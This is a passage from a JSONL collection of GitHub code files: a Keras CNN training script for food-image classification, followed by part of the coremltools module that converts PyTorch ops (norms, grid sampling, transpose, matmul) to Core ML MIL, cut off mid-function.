1][j]\nprint(max(ans[-1]))","repo_name":"CodeTest-StudyGroup/Code-Test-Study","sub_path":"JongHo/BOJ/14728.py","file_name":"14728.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":1095,"dataset":"github-code","pt":"47"}
{"seq_id":"72380330384","text":"from __future__ import print_function\nfrom configs import train_path, test_path\nimport keras\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nimport os\n\nbatch_size = 40\nnum_classes = 2\nepochs = 30\ndata_augmentation = True\nsave_dir = os.path.join(os.getcwd(), 'archive')\nmodel_name = 'kerasfoodsmall-mRMS.h5'\n\n# Optimizers\nopt1 = keras.optimizers.RMSprop(learning_rate=0.0001, decay=1e-6)\nopt3 = keras.optimizers.Adagrad(learning_rate=0.01)\nopt5 = keras.optimizers.Adam(learning_rate=0.001, beta_1=0.9, beta_2=0.999, amsgrad=False)\n\n# Added parameters\ndense_layers = [1, 2]\nlayer_sizes = [32, 64]\n#optimizers = [opt1, opt3, opt5]\n\nmodel_path = os.path.join(save_dir, model_name)\n\ntrain_datagen = ImageDataGenerator(\n    rescale=1./255,\n    shear_range=0.2,\n    zoom_range=0.2,\n    horizontal_flip=True)\n\ntest_datagen = ImageDataGenerator(rescale=1./255)\n\ntrain_generator = train_datagen.flow_from_directory(\n    directory=train_path,\n    target_size=(128, 128),\n    color_mode='rgb',\n    batch_size=batch_size,\n    class_mode='categorical',\n    shuffle=True,\n    seed = 1)\n\ntest_generator = test_datagen.flow_from_directory(\n    directory=test_path,\n    target_size=(128, 128),\n    batch_size=batch_size,\n    class_mode='categorical')\n\nfor dense_layer in dense_layers:\n    for layer_size in layer_sizes:\n\n        namedir = \"Optimizedmodel-RMS-optimizer-{}-nodes-{}-dense\".format( layer_size, dense_layer)\n        tensorboard_callback = keras.callbacks.TensorBoard(log_dir='foodsmallmodifiedruns1\\{}'.format(namedir))\n        model = Sequential()\n\n        model.add(Conv2D(32, (3, 3), padding='same', input_shape=(128,128,3)))\n        model.add(Activation('relu'))\n\n        model.add(Conv2D(32, (3, 3)))\n        model.add(Activation('relu'))\n        model.add(MaxPooling2D(pool_size=(2, 2)))\n        model.add(Dropout(0.25))\n\n        model.add(Conv2D(64, (3, 3), padding='same'))\n        model.add(Activation('relu'))\n        model.add(Conv2D(64, (3, 3)))\n        model.add(Activation('relu'))\n        model.add(MaxPooling2D(pool_size=(2, 2)))\n        model.add(Dropout(0.25))\n\n        model.add(Flatten())\n        \n        for _ in range(dense_layer):\n            model.add(Dense(layer_size))\n            model.add(Activation('relu'))\n        \n        model.add(Dropout(0.5))\n        model.add(Dense(num_classes))\n        model.add(Activation('softmax'))\n\n        opt = opt1 # RMSprop optimizer\n        #opt = opt3 # Adagrad optimizer\n        #opt = opt5 # Adam optimizer\n\n        if os.path.exists(model_path):\n            print(\"LOADING OLD MODEL\")\n            model.load_weights(model_path)\n\n        model.compile(loss= 'categorical_crossentropy',\n                      optimizer=opt,\n                      metrics=['accuracy'])\n\n        model.fit_generator(train_generator,\n                            epochs=epochs,\n                            steps_per_epoch=batch_size, # Specifying steps per epoch\n                            validation_data=test_generator,\n                            callbacks=[tensorboard_callback])\n\n\nmodel.save(model_path)\n","repo_name":"alex-g-tejada/Convolution-Food","sub_path":"kerasmain-modified.py","file_name":"kerasmain-modified.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"7861238408","text":"import builtins\nimport math as _math\nimport numbers\nimport re\nfrom collections.abc 
import Iterable\nfrom typing import Any, List, Optional, Tuple\n\nimport numpy as _np\nimport numpy as np\nimport torch\nfrom tqdm import tqdm as _tqdm\n\nfrom coremltools import _logger as logger\nfrom coremltools.converters.mil._deployment_compatibility import AvailableTarget as target\nfrom coremltools.converters.mil.mil import Builder as mb\nfrom coremltools.converters.mil.mil import Symbol, types\nfrom coremltools.converters.mil.mil.block import is_current_opset_version_compatible_with\nfrom coremltools.converters.mil.mil.ops.defs._utils import (\n MAX_SIZE_CONSTANT_FOLDING,\n promote_input_dtypes,\n solve_slice_by_index_shape,\n)\nfrom coremltools.converters.mil.mil.types import is_bool, nptype_from_builtin\nfrom coremltools.converters.mil.mil.types.symbolic import any_symbolic, is_symbolic\nfrom coremltools.converters.mil.mil.types.type_mapping import builtin_to_string\nfrom coremltools.converters.mil.mil.var import ListVar, Var\n\nfrom .._utils import build_einsum_mil, value_at\nfrom .torch_op_registry import _TORCH_OPS_REGISTRY, register_torch_op\n\n# The pytorch args for many of the below ops were sourced from\n# https://github.com/pytorch/pytorch/blob/d971007c291c0ead1003d12cd553d18ddb582207/torch/csrc/jit/mobile/register_mobile_ops.cpp#L216\n\n\n# Max int64 value. Used as a default value in many PyTorch functions.\nPYTORCH_DEFAULT_VALUE = 2**63 - 1\n\nVALUE_CLOSE_TO_INFINITY = 1e+38\n\n\ndef _all_outputs_present(context, graph):\n \"\"\"\n Returns true if all the symbols in the graph's output list are\n present in context.\n \"\"\"\n for outp in graph.outputs:\n try:\n context[outp]\n except ValueError:\n return False\n return True\n\n\ndef convert_nodes(context, graph):\n \"\"\"\n Iterate over the nodes of a graph or block and convert to MIL.\n\n Arguments:\n context: A TranscriptionContext object to pull node inputs and\n assign node outputs.\n graph: An InternalTorchIRGraph or InternalTorchIRBlock object.\n \"\"\"\n for node in _tqdm(graph.nodes, desc=\"Converting PyTorch Frontend ==> MIL Ops\", unit=\" ops\"):\n op_lookup = node.kind\n add_op = _TORCH_OPS_REGISTRY.get_func(op_lookup)\n if add_op is None:\n if re.match(r\".*_dynamic\", op_lookup):\n raise RuntimeError(\n f\"PyTorch convert function for op '{op_lookup}' not implemented.\\n\"\n \"Dynamic quantized models are not supported by Core ML.\\n\"\n \"Please use static quantization or the APIs in coremltools.optimize to quantize/compress models.\"\n )\n else:\n raise RuntimeError(\n f\"PyTorch convert function for op '{op_lookup}' not implemented.\"\n )\n\n logger.info(\"Converting op {} : {}\".format(node.name, op_lookup))\n\n context.quant_context.maybe_handle_quantized_inputs(node)\n context.prepare_for_conversion(node)\n\n add_op(context, node)\n\n if _TORCH_OPS_REGISTRY.is_inplace_op(op_lookup):\n context.process_inplace_op(node)\n\n # We've generated all the outputs the graph needs, terminate conversion.\n if _all_outputs_present(context, graph):\n break\n\n\ndef convert_block(context, block, inputs):\n \"\"\"Convert a block (sub-graph) to MIL. Conversion happens within a new\n context frame.\n\n Arguments:\n context: A TranscriptionContext object to pull node inputs and\n assign node outputs.\n block: An InternalTorchIRBlock object.\n inputs: List of Vars from the outer context that map to the block's\n expected inputs. 
The number of inputs provided must match the\n number expected by the block.\n \"\"\"\n\n assert len(block.inputs) == len(inputs)\n\n # Start a new context frame.\n context.push((block.inputs, inputs))\n\n # Add the block ops.\n convert_nodes(context, block)\n\n # Collect the block outputs.\n outputs = [context[outp] for outp in block.outputs]\n\n # Return to the previous context frame.\n context.pop()\n return outputs\n\n\n# Some ops will receive a dtype input as an integer\n# which maps to a torch dtype. The below mapping was found by\n# converting test models with different dtypes passed to ones.\nNUM_TO_TORCH_DTYPE = {\n 0: torch.uint8,\n 1: torch.int8,\n 2: torch.int16,\n 3: torch.int32,\n 4: torch.int32,\n 5: torch.float16,\n 6: torch.float32,\n 7: torch.float32,\n 11: torch.bool,\n 12: torch.qint8,\n 13: torch.quint8,\n 14: torch.qint32,\n}\n\nTORCH_DTYPE_TO_NUM = {\n dtype: val for val, dtype in NUM_TO_TORCH_DTYPE.items()\n}\n\nNUMPY_DTYPE_TO_TORCH_NUM = {\n _np.uint8: 0,\n _np.int8: 1,\n _np.int16: 2,\n _np.int32: 3,\n _np.int64: 4,\n _np.float16: 5,\n _np.float32: 6,\n _np.float64: 7,\n bool: 11,\n}\n\nNUM_TO_NUMPY_DTYPE = {\n 0: _np.uint8,\n 1: _np.int8,\n 2: _np.int16,\n 3: _np.int32,\n 4: _np.int32,\n 5: _np.float16,\n 6: _np.float32,\n 7: _np.float32,\n 11: bool,\n}\n\nNUM_TO_DTYPE_STRING = {\n 2: \"int16\",\n 3: \"int32\",\n 4: \"int32\",\n 5: \"fp16\",\n 6: \"fp32\",\n 7: \"fp32\",\n 11: \"bool\",\n}\n\nTYPE_TO_DTYPE_STRING = {\n types.bool: \"bool\",\n types.fp16: \"fp16\",\n types.fp32: \"fp32\",\n types.int32: \"int32\",\n}\n\n\ndef _get_inputs(context, node, expected=None, min_expected=None) -> List[Var]:\n \"\"\"\n Look up a node's inputs in @context and return them as a list. If\n @expected is not None, also verifies the number of inputs matches the\n value of @expected.\n \"\"\"\n\n def get_bindings(alist) -> List[Any]:\n \"\"\"\n This utility is needed in order to handle following cases:\n With EdgeIR,\n - Some of the inputs can be literals (like axis, perms) and thus can be of types: list, int etc.\n - An Input Parameter of an op could be a list/tuple similar to our concat layer\n \"\"\"\n results = []\n\n for i in alist:\n if isinstance(i, str):\n results.append(context[i])\n elif isinstance(i, (list, tuple)) and all(isinstance(j, int) for j in i):\n results.append(mb.const(val=i))\n elif isinstance(i, (list, tuple)):\n results.append(get_bindings(i))\n elif isinstance(i, (int, float)):\n results.append(mb.const(val=i))\n elif i is None:\n results.append(None)\n else:\n raise NotImplementedError(f\"Binding of inputs of type {type(i)} not handled yet\")\n\n return results\n\n inputs = get_bindings(node.inputs)\n\n if expected is not None:\n expected = [expected] if not isinstance(expected, (list, tuple)) else expected\n\n if len(inputs) not in expected:\n raise ValueError(\n \"node {} ({}) got {} input(s), expected {}\".format(\n node.name, node.kind, len(inputs), expected\n )\n )\n if min_expected is not None:\n if len(inputs) < min_expected:\n raise ValueError(\n \"node {} ({}) got {} input(s), expected minimum {} inputs\".format(\n node.name, node.kind, len(inputs), min_expected\n )\n )\n\n return inputs\n\n\ndef _list_select(shape_var, index):\n \"\"\"\n Sometimes we need to select a specific item from a list. If that item\n is known at compile time, extract it as a const. 
Otherwise, if it's\n    symbolic, use gather.\n    \"\"\"\n    if shape_var.can_be_folded_to_const():\n        res = mb.const(val=shape_var.val[index])\n    else:\n        if is_current_opset_version_compatible_with(target.iOS17):\n            # IOS17 `gather` requires non-negative indices.\n            index = mb.select(\n                cond=mb.greater_equal(x=index, y=0),\n                a=index,\n                b=mb.add(x=index, y=value_at(mb.shape(x=shape_var), 0)),\n            )\n        res = mb.gather(x=shape_var, indices=index)\n    return res\n\ndef _is_const(var, optional=False):\n    \"\"\"\n    Check if a var is a const.\n    It could be `const` or `constexpr_` ops.\n    \"\"\"\n    if optional and var is None:\n        return True\n    if isinstance(var, np.ndarray):\n        return True\n    return var is not None and (var.val is not None or var.op.op_type.startswith(\"constexpr_\"))\n\ndef _create_linear_layer(x, w, bias):\n    \"\"\"\n    Utility to translate linear layer.\n    Since the linear layer can only take `const` or `constexpr_` weight as input,\n    for other cases, we implement the linear layer through matmul.\n\n    For instance, given a torch model with an int8 weight:\n\n    int8_weight -> transpose -> reshape -> linear\n\n    If we directly use `mb.linear`, it is going to produce compilation error at the runtime.\n    \"\"\"\n    if _is_const(w) and _is_const(bias, optional=True):\n        return mb.linear(x=x, weight=w, bias=bias)\n    res = mb.matmul(x=x, y=w, transpose_y=True)\n    if bias is not None:\n        res = mb.add(x=res, y=bias)\n    return res\n\ndef _construct_constant(val, name):\n    # Converter cannot handle torch tensors.\n    if isinstance(val, torch.Tensor):\n        val = val.cpu().numpy()\n\n    # MIL casts ints to int32, which can't represent PyTorch's default value.\n    # So we instead represent it with None, and any ops that might get the\n    # value will check for None instead.\n    if isinstance(val, int) and val == PYTORCH_DEFAULT_VALUE:\n        val = None\n\n    # Pytorch uses inf\n    if val is not None and isinstance(val, numbers.Number) and _np.isinf(val):\n        if val < 0: # neg inf\n            # most negative number in fp32\n            val = -3.4e+38\n        else: # positive inf\n            val = 3.4e+38\n    if val is None:\n        return None\n    else:\n        return mb.const(val=val, name=name)\n\n\n@register_torch_op\ndef affine_grid_generator(context, node):\n    # rdar://73165386 (Improve error handling of coremltools \"affine\" op PyTorch conversion.)\n\n    affine_op_name = node.name\n    theta, size, align_corners = _get_inputs(context, node, expected=3)\n\n    # note: only add consts here as PyTorch uses affine_grid + grid_sampler together\n    is_theta_const = theta.val is not None\n    if is_theta_const:\n        context.add(mb.const(val=theta.val, name=\"{}_theta\".format(affine_op_name)))\n    else: # theta is dynamic input, keep track of its name\n        context.add(mb.const(val=theta.name, name=\"{}_theta\".format(affine_op_name)))\n\n    context.add(mb.const(val=size.val, name=\"{}_size\".format(affine_op_name)))\n    context.add(mb.const(val=align_corners.val, name=\"{}_align_corners\".format(affine_op_name)))\n\n\n@register_torch_op\ndef grid_sampler(context, node):\n    affine_op_name = node.inputs[1]\n    # https://github.com/pytorch/pytorch/blob/00d432a1ed179eff52a9d86a0630f623bf20a37a/aten/src/ATen/native/GridSampler.h#L10-L11\n    m_mode = {0: \"bilinear\", 1: \"nearest\"}\n    m_padding_mode = {0: \"constant\", 1: \"border\", 2: \"reflection\"}\n\n    # add `resample` if grid/coordinates is in input, otherwise,\n    # add `affine` to generate grid from `affine_grid_generator`.\n    if affine_op_name in context: # add `resample` op\n        inputs = _get_inputs(context, node, expected=5)\n        sampling_mode = m_mode[inputs[2].val]\n        padding_mode = 
m_padding_mode[inputs[3].val]\n        align_corners = inputs[4].val\n\n        # When align_corners=False, padding_mode 'reflection' corresponds to Core ML's 'symmetric'\n        if padding_mode == \"reflection\" and align_corners is False:\n            padding_mode = \"symmetric\"\n\n        x = mb.resample(\n            x=inputs[0],\n            coordinates=inputs[1],\n            sampling_mode=sampling_mode,\n            padding_mode=padding_mode,\n            padding_value=0.0,\n            coordinates_mode=\"normalized_minus_one_to_one\",\n            align_corners=align_corners,\n            name=node.name,\n        )\n        context.add(x)\n    else: # add `affine` op instead\n        x = context[node.inputs[0]]\n        # inputs from `affine_grid_generator`\n        affine_theta = context[\"{}_theta\".format(affine_op_name)]\n        affine_size = context[\"{}_size\".format(affine_op_name)]\n        affine_align_corners = context[\"{}_align_corners\".format(affine_op_name)]\n\n        # affine_theta.val is either name string (dynamic input) or np.ndarray (static values)\n        # see `affine_grid_generator` for details.\n        is_theta_const = not isinstance(affine_theta.val, str)\n        if is_theta_const:\n            transform_matrix = _np.reshape(affine_theta.val, (affine_theta.shape[0], 6))\n        else: # theta is dynamic input, add `reshape` op to PyMIL\n            transform_matrix = mb.reshape(\n                x=context[affine_theta.val],\n                shape=(-1, 6),\n                name=node.name + \"_theta_reshape\",\n            )\n\n        # inputs from `grid_sampler`\n        sampling_mode = m_mode[context[node.inputs[2]].val]\n        padding_mode = m_padding_mode[context[node.inputs[3]].val]\n        align_corners = context[node.inputs[4]].val\n\n        if sampling_mode != \"bilinear\":\n            raise NotImplementedError(\"'sampling_mode' not supported.\")\n\n        if padding_mode != \"constant\":\n            raise NotImplementedError(\"'padding_mode' not supported.\")\n\n        if affine_align_corners.val != align_corners:\n            raise ValueError(\n                \"Op 'affine_grid_generator' and 'grid_sampler' must agree on 'align_corners'.\"\n            )\n\n        x = mb.affine(\n            x=x,\n            transform_matrix=transform_matrix,\n            output_height=affine_size.val[2],\n            output_width=affine_size.val[3],\n            sampling_mode=sampling_mode,\n            padding_mode=padding_mode,\n            padding_value=0.0,\n            coordinates_mode=\"normalized_minus_one_to_one\",\n            align_corners=align_corners,\n            name=node.name,\n        )\n        context.add(x)\n\n\n@register_torch_op\ndef silu(context, node):\n    inputs = _get_inputs(context, node, expected=1)\n    x = mb.silu(x=inputs[0], name=node.name)\n    context.add(x)\n\n\n@register_torch_op\ndef constant(context, node):\n    assert len(node.inputs) == 0\n    assert len(node.outputs) == 1\n\n    name = node.name\n    val = node.attr[\"value\"]\n\n    const = _construct_constant(val, name)\n    context.add(const, torch_name=name)\n\n\n@register_torch_op\ndef cosine_similarity(context, node):\n    inputs = _get_inputs(context, node, expected=4)\n    dim = inputs[-2].val\n    eps = inputs[-1].val\n    xy = mb.mul(x=inputs[0], y=inputs[1])\n    sum_xy = mb.reduce_sum(x=xy, axes=[dim])\n\n    xx = mb.mul(x=inputs[0], y=inputs[0])\n    sum_xx = mb.reduce_sum(x=xx, axes=[dim])\n    yy = mb.mul(x=inputs[1], y=inputs[1])\n    sum_yy = mb.reduce_sum(x=yy, axes=[dim])\n\n    mul_sum_xy = mb.mul(x=sum_xx, y=sum_yy)\n    div_12 = mb.maximum(x=mul_sum_xy, y=eps * eps)\n    div_sqrt = mb.sqrt(x=div_12)\n\n    cs = mb.real_div(x=sum_xy, y=div_sqrt, name=node.name)\n    context.add(cs)\n\n\n@register_torch_op\ndef selu(context, node):\n    ALPHA = 1.6732632423543772\n    SCALE = 1.0507009873554805\n\n    x = _get_inputs(context, node, expected=1)[0]\n    x = mb.elu(x=x, alpha=ALPHA)\n    x = mb.mul(x=x, y=SCALE, name=node.name)\n    context.add(x)\n\n\n@register_torch_op\ndef dot(context, node):\n    inputs = _get_inputs(context, node, expected=2)\n    xy = 
mb.mul(x=inputs[0], y=inputs[1])\n    sum_xy = mb.reduce_sum(x=xy, axes=[0])\n    context.add(sum_xy, node.name)\n\n\n@register_torch_op\ndef mv(context, node):\n    inputs = _get_inputs(context, node, expected=2)\n    expand = mb.expand_dims(x=inputs[1], axes=[-1], name=node.name + \"_expanded\")\n    mv = mb.matmul(x=inputs[0], y=expand, name=node.name + \"_mv\")\n    res = mb.squeeze(x=mv, axes=[-1], name=node.name)\n    context.add(res)\n\n\n@register_torch_op\ndef outer(context, node):\n    inputs = _get_inputs(context, node, expected=2)\n    x = mb.reshape(x=inputs[0], shape=[-1, 1])\n    y = mb.reshape(x=inputs[1], shape=[1, -1])\n    res = mb.matmul(x=x, y=y, name=node.name)\n    context.add(res)\n\n\n@register_torch_op\ndef cross(context, node):\n    inputs = _get_inputs(context, node, expected=3)\n    x = inputs[0]\n    y = inputs[1]\n    dim = inputs[2]\n\n    x1 = mb.gather(x=x, indices=[1, 2, 0], axis=dim, name=\"x1\")\n    x2 = mb.gather(x=x, indices=[2, 0, 1], axis=dim, name=\"x2\")\n    y1 = mb.gather(x=y, indices=[1, 2, 0], axis=dim, name=\"y1\")\n    y2 = mb.gather(x=y, indices=[2, 0, 1], axis=dim, name=\"y2\")\n    m1 = mb.mul(x=x1, y=y2)\n    m2 = mb.mul(x=x2, y=y1)\n    z = mb.sub(x=m1, y=m2, name=node.name)\n    context.add(z)\n\n\n@register_torch_op\ndef frobenius_norm(context, node):\n    x, dim, keep_dims = _get_inputs(context, node, expected=3)\n    result = mb.reduce_l2_norm(x=x, axes=dim, keep_dims=keep_dims, name=node.name)\n    context.add(result)\n\n\n@register_torch_op\ndef norm(context, node):\n    x, num, dim, keep_dims = _get_inputs(context, node, expected=4)\n    assert x is not None and keep_dims is not None and num is not None and dim is not None\n    temp = _vector_norm(x=x, order=num, dim=dim, keep_dims=keep_dims, name=node.name)\n    context.add(temp)\n\n\ndef _vector_norm(x, order, dim, keep_dims, name):\n    if order.val == 0:\n        # sum(x!=0)\n        x = mb.cast(x=x, dtype=\"fp32\")\n        temp = mb.not_equal(x=x, y=0.)\n        temp = mb.cast(x=temp, dtype='int32')\n        temp = mb.reduce_sum(x=temp, axes=dim, keep_dims=keep_dims, name=name)\n    elif order.val > VALUE_CLOSE_TO_INFINITY:\n        # max(abs(x))\n        temp = mb.abs(x=x)\n        temp = mb.reduce_max(x=temp, axes=dim, keep_dims=keep_dims, name=name)\n    elif order.val < -VALUE_CLOSE_TO_INFINITY:\n        # min(abs(x))\n        temp = mb.abs(x=x)\n        temp = mb.reduce_min(x=temp, axes=dim, keep_dims=keep_dims, name=name)\n    else:\n        # sum(abs(x)^{order})^{(1 / order)}\n        temp = mb.abs(x=x)\n        x, y = promote_input_dtypes([temp, order.val])\n        temp = mb.pow(x=x, y=y)\n        temp = mb.reduce_sum(x=temp, axes=dim, keep_dims=keep_dims)\n        temp = mb.pow(x=temp, y=1.0 / order.val, name=name)\n    return temp\n\n@register_torch_op\ndef _weight_norm(context, node):\n    v, g, dim = _get_inputs(context, node, expected=3)\n\n    # Determine axes for L2 norm\n    if dim.val == -1:\n        axes = None\n    else:\n        axes = list(range(v.rank))\n        dim = dim.val\n        if dim >= 0:\n            axes.remove(dim)\n        else:\n            axes.remove(v.rank + dim)\n\n    # Calculate L2 norm of v\n    temp = mb.pow(x=v, y=2.)\n    temp = mb.reduce_sum(x=temp, axes=axes, keep_dims=True)\n    norm = mb.pow(x=temp, y=1./2)\n\n    inverse_norm = mb.inverse(x=norm)\n    direction = mb.mul(x=v, y=inverse_norm)\n    result = mb.mul(x=g, y=direction, name=node.name)\n    context.add(result)\n\n\n\ndef _matrix_norm(x, order, dim, keep_dims, name):\n    if order.val == 1:\n        # max(sum(abs(x), dim=0))\n        temp = mb.abs(x=x)\n        temp = mb.reduce_sum(x=temp, axes=[dim[0]], keep_dims=True)\n        temp = mb.reduce_max(x=temp, axes=dim, keep_dims=keep_dims, name=name)\n    elif order.val == -1:\n        # min(sum(abs(x), dim=0))\n        temp = mb.abs(x=x)\n        temp = mb.reduce_sum(x=temp, 
axes=[dim[0]], keep_dims=True)\n        temp = mb.reduce_min(x=temp, axes=dim, keep_dims=keep_dims, name=name)\n    elif order.val == \"fro\":\n        # sum(x**2)**(1/2)\n        temp = mb.reduce_l2_norm(x=x, axes=dim, keep_dims=keep_dims, name=name)\n    elif order.val > VALUE_CLOSE_TO_INFINITY:\n        # max(sum(abs(x), dim=1))\n        temp = mb.abs(x=x)\n        temp = mb.reduce_sum(x=temp, axes=[dim[1]], keep_dims=True)\n        temp = mb.reduce_max(x=temp, axes=dim, keep_dims=keep_dims, name=name)\n    elif order.val < -VALUE_CLOSE_TO_INFINITY:\n        # min(sum(abs(x), dim=1))\n        temp = mb.abs(x=x)\n        temp = mb.reduce_sum(x=temp, axes=[dim[1]], keep_dims=True)\n        temp = mb.reduce_min(x=temp, axes=dim, keep_dims=keep_dims, name=name)\n    else:\n        raise RuntimeError(\"Matrix norm is not defined for the current inputs\")\n    return temp\n\n\n@register_torch_op\ndef narrow(context, node):\n    x, dim, start, length = _get_inputs(context, node, expected=4)\n\n    begin = [0] * len(x.shape)\n    begin[dim.val] = start.val\n\n    end = list(x.shape)\n    end[dim.val] = start.val + length.val\n\n    context.add(\n        mb.slice_by_index(x=x, begin=begin, end=end, name=node.name)\n    )\n\n\n@register_torch_op\ndef linalg_vector_norm(context, node):\n    x, order, dim, keep_dims, _ = _get_inputs(context, node, expected=5)\n    assert x is not None and keep_dims is not None and order is not None\n    temp = _vector_norm(x=x, order=order, dim=dim, keep_dims=keep_dims, name=node.name)\n    context.add(temp)\n\n\n@register_torch_op\ndef linalg_matrix_norm(context, node):\n    x, order, dim, keep_dims, _ = _get_inputs(context, node, expected=5)\n    assert x is not None and keep_dims is not None and order is not None and dim is not None\n    assert len(dim.val) == 2\n    temp = _matrix_norm(x=x, order=order, dim=dim.val, keep_dims=keep_dims, name=node.name)\n    context.add(temp)\n\n\n@register_torch_op\ndef linalg_norm(context, node):\n    x, order, dim, keep_dims, _ = _get_inputs(context, node, expected=5)\n    assert x is not None and keep_dims is not None\n    if dim is None:\n        dim = _np.arange(x.rank)\n    else:\n        dim = dim.val\n    if order is None:\n        temp = mb.reduce_l2_norm(x=x, axes=dim, keep_dims=keep_dims, name=node.name)\n    elif len(dim) == 2:\n        temp = _matrix_norm(\n            x=x, order=order, dim=dim, keep_dims=keep_dims, name=node.name\n        )\n    else:\n        temp = _vector_norm(x=x, order=order, dim=dim, keep_dims=keep_dims, name=node.name)\n    context.add(temp)\n\n\n@register_torch_op\ndef hardswish(context, node):\n    inputs = _get_inputs(context, node, expected=1)\n    x = inputs[0]\n\n    w = mb.thresholded_relu(x=x, alpha=-3.0)\n    y = mb.sigmoid_hard(\n        x=w, alpha=1.0 / 6, beta=0.5\n    ) # ``y = min(max(alpha * x + beta, 0), 1)\n    result = mb.mul(x=w, y=y, name=node.name)\n\n    context.add(result)\n\n\n@register_torch_op\ndef reshape_as(context, node):\n    inputs = _get_inputs(context, node, expected=2)\n    x = inputs[0]\n    ref = inputs[1]\n    shape = mb.shape(x=ref)\n    result = mb.reshape(x=x, shape=shape, name=node.name)\n    context.add(result)\n\n\n@register_torch_op\ndef unflatten(context, node):\n    x, dim_var, unflattened_size_var = _get_inputs(context, node, expected=3)\n    x_shape = x.shape\n    dim = dim_var.val\n    unflattened_size = tuple(unflattened_size_var.val)\n    assert x_shape is not None\n    assert dim is not None\n    assert unflattened_size is not None\n    assert x_shape[dim] == _np.prod(unflattened_size)\n\n    if dim < 0:\n        dim += x.rank\n\n    shape = x_shape[:dim] + unflattened_size + x_shape[dim + 1:]\n    y = mb.reshape(x=x, shape=shape, name=node.name)\n    context.add(y)\n\n\ndef _array_construct(context, node, array_type):\n    assert len(node.outputs) == 1\n    
inputs = _get_inputs(context, node)\n scalar_inputs = [\n inp\n for inp in inputs\n if isinstance(inp, Var) and inp.can_be_folded_to_const() and len(inp.shape) == 0\n ]\n\n if len(scalar_inputs) == len(inputs):\n # All the list items are compile-time scalar constants, so let's create\n # a new const that concatenates them.\n val = array_type([inp.val for inp in inputs])\n const = mb.const(val=val, name=node.name)\n context.add(const)\n else:\n # If at least one input to the construct op is non-const, collect\n # the inputs and add them directly to the context. Ops that use this\n # node's output will take the list directly as input.\n context.add(array_type(inputs), node.name)\n\n\n@register_torch_op\ndef tupleconstruct(context, node):\n _array_construct(context, node, array_type=tuple)\n\n\n@register_torch_op\ndef listconstruct(context, node):\n _array_construct(context, node, array_type=list)\n\n\n@register_torch_op\ndef eq(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x = inputs[0]\n y = inputs[1]\n if is_bool(x.dtype):\n x = mb.cast(x=x, dtype=\"int32\")\n if is_bool(y.dtype):\n y = mb.cast(x=y, dtype=\"int32\")\n x, y = promote_input_dtypes([x, y])\n equal_to = mb.equal(x=x, y=y, name=node.name)\n context.add(equal_to)\n\n\n@register_torch_op\ndef ne(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x = inputs[0]\n y = inputs[1]\n if is_bool(x.dtype):\n x = mb.cast(x=x, dtype=\"int32\")\n if is_bool(y.dtype):\n y = mb.cast(x=y, dtype=\"int32\")\n x, y = promote_input_dtypes([x, y])\n equal_to = mb.not_equal(x=x, y=y, name=node.name)\n context.add(equal_to)\n\n\n@register_torch_op\ndef le(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x, y = promote_input_dtypes(inputs)\n less_equal = mb.less_equal(x=x, y=y, name=node.name)\n context.add(less_equal)\n\n\n@register_torch_op\ndef lt(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x, y = promote_input_dtypes(inputs)\n less = mb.less(x=x, y=y, name=node.name)\n context.add(less)\n\n\n@register_torch_op\ndef ge(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x, y = promote_input_dtypes(inputs)\n greater_equal = mb.greater_equal(x=x, y=y, name=node.name)\n context.add(greater_equal)\n\n\n@register_torch_op\ndef gt(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x, y = promote_input_dtypes(inputs[:2])\n greater = mb.greater(x=x, y=y, name=node.name)\n context.add(greater)\n\n\n@register_torch_op(torch_alias=[\"t\", \"numpy_t\"])\ndef transpose(context, node):\n assert len(node.outputs) == 1\n inputs = _get_inputs(context, node)\n x = inputs[0]\n\n if len(node.inputs) == 1:\n # PyTorch has several transpose ops that can be emitted. 
This one is only\n # emitted when .t() is called on a tensor, which means it can only be\n # called on a matrix.\n if len(x.shape) > 2:\n raise ValueError(\"transpose without dims for rank > 2 is unsupported\")\n res = mb.transpose(x=x, perm=[1, 0], name=node.name)\n else:\n assert len(inputs) == 3\n ax0 = inputs[1].val\n ax1 = inputs[2].val\n\n perm = list(range(len(x.shape)))\n perm[ax0] = ax1\n perm[ax1] = ax0\n\n res = mb.transpose(x=x, perm=perm, name=node.name)\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"permute\"])\ndef permute_copy(context, node):\n inputs = _get_inputs(context, node, expected=2)\n perm = mb.transpose(x=inputs[0], perm=inputs[1], name=node.name)\n context.add(perm)\n\n\n@register_torch_op\ndef frac(context, node):\n # Frac(x) = x - floor(abs(x)) * sign(x)\n\n x = _get_inputs(context, node, expected=1)[0]\n floor_abs = mb.floor(x=mb.abs(x=x))\n sign_abs_floor = mb.mul(x=floor_abs, y=mb.sign(x=x))\n res = mb.sub(x=x, y=sign_abs_floor)\n context.add(res, torch_name=node.name)\n\n\n@register_torch_op\ndef pixel_shuffle(context, node):\n inputs = _get_inputs(context, node, expected=2)\n perm = mb.pixel_shuffle(x=inputs[0], upscale_factor=inputs[1], name=node.name)\n context.add(perm)\n\n\n@register_torch_op\ndef pixel_unshuffle(context, node):\n inputs = _get_inputs(context, node, expected=2)\n downscale_factor = _np.uint32(inputs[1].val)\n perm = mb.pixel_unshuffle(x=inputs[0], downscale_factor=downscale_factor, name=node.name)\n context.add(perm)\n\n\n@register_torch_op(torch_alias=[\"bmm\", \"mm\"])\ndef matmul(context, node):\n inputs = _get_inputs(context, node, expected=2)\n if inputs[1].val is not None and \\\n len(inputs[1].shape) == 2 and len(inputs[0].shape) <= 3:\n res = mb.linear(x=inputs[0], weight=_np.transpose(inputs[1].val), name=node.name)\n else:\n x, y = promote_input_dtypes([inputs[0], inputs[1]])\n res = mb.matmul(x=x, y=y, name=node.name)\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"add.tensor\"])\ndef add(context, node):\n add_inputs = _get_inputs(context, node)\n assert len(node.outputs) == 1\n\n # TODO (sberardi): 3rd param to aten::add is a scale factor, need to handle that.\n # out=input+alpha x other\n 